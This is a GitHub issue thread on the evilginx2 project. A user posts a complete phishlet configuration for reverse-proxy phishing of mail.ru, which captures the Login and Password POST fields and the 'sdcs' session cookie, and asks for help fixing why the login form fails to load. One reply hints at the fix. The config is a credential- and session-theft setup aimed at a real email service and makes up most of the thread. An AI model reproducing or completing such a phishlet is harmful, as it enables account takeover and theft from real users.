### ISSUE TITLE
Help me to make mail.ru phishlet

### ISSUE THREAD

**Issue by devAji917** [kgretzky/evilginx2#253]
Hello.
This project is great !
i am going to make mail.ru phishlet for testing.
Target URL is https://e.mail.ru
i have made phishlet by myself.
####################Mailru.yaml##############################

author: '@climber'
min_ver: '2.2.0'
proxy_hosts:
  - {phish_sub: '', orig_sub: '', domain: 'mail.ru', session: false, is_landing: false}
  - {phish_sub: 'e', orig_sub: 'e', domain: 'mail.ru', session: true, is_landing: true}
  - {phish_sub: 'r', orig_sub: 'r', domain: 'mail.ru', session: false, is_landing: false}
  - {phish_sub: 'auth', orig_sub: 'auth', domain: 'mail.ru', session: false, is_landing: false}
  - {phish_sub: 'account', orig_sub: 'account', domain: 'mail.ru', session: false, is_landing: false}
  - {phish_sub: 'img', orig_sub: 'img', domain: 'imgsmail.ru', session: false, is_landing: false}
sub_filters:
  - {triggers_on: 'mail.ru', orig_sub: '', domain: 'mail.ru', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json', 'application/javascript']}
  - {triggers_on: 'e.mail.ru', orig_sub: 'e', domain: 'mail.ru', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json', 'application/javascript']}
  - {triggers_on: 'r.mail.ru', orig_sub: 'r', domain: 'mail.ru', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json', 'application/javascript']}
  - {triggers_on: 'auth.mail.ru', orig_sub: 'auth', domain: 'mail.ru', search: 'https://{hostname}/cgi-bin/auth', replace: 'https://{hostname}/cgi-bin/auth', mimes: ['text/html', 'application/json', 'application/javascript']}
  - {triggers_on: 'account.mail.ru', orig_sub: 'account', domain: 'mail.ru', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json', 'application/javascript']}
  - {triggers_on: 'img.imgsmail.ru', orig_sub: 'img', domain: 'imgsmail.ru', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json', 'application/javascript']}
auth_tokens:
  - domain: '.mail.ru'
    keys: ['sdcs']
credentials:
  username:
    key: 'Login'
    search: '(.*)'
    type: 'post'
  password:
    key: 'Password'
    search: '(.*)'
    type: 'post'
landing_path:
  - '/login'

##################################################
But login form is not loading by this phishlet
Everyone can see my phishlet and help me what is issue.
Thanks.

**Comment by oaredece** [comment]
orig_sub: ''  ...here is your problem

**Comment by devAji917** [comment]
Thanks for reply.
what should i have to fix orig_sub?
Can you share your think?

**Comment by kgretzky** [comment]
Guys, please set up a Discord channel or something. Report only issues with the tool here.
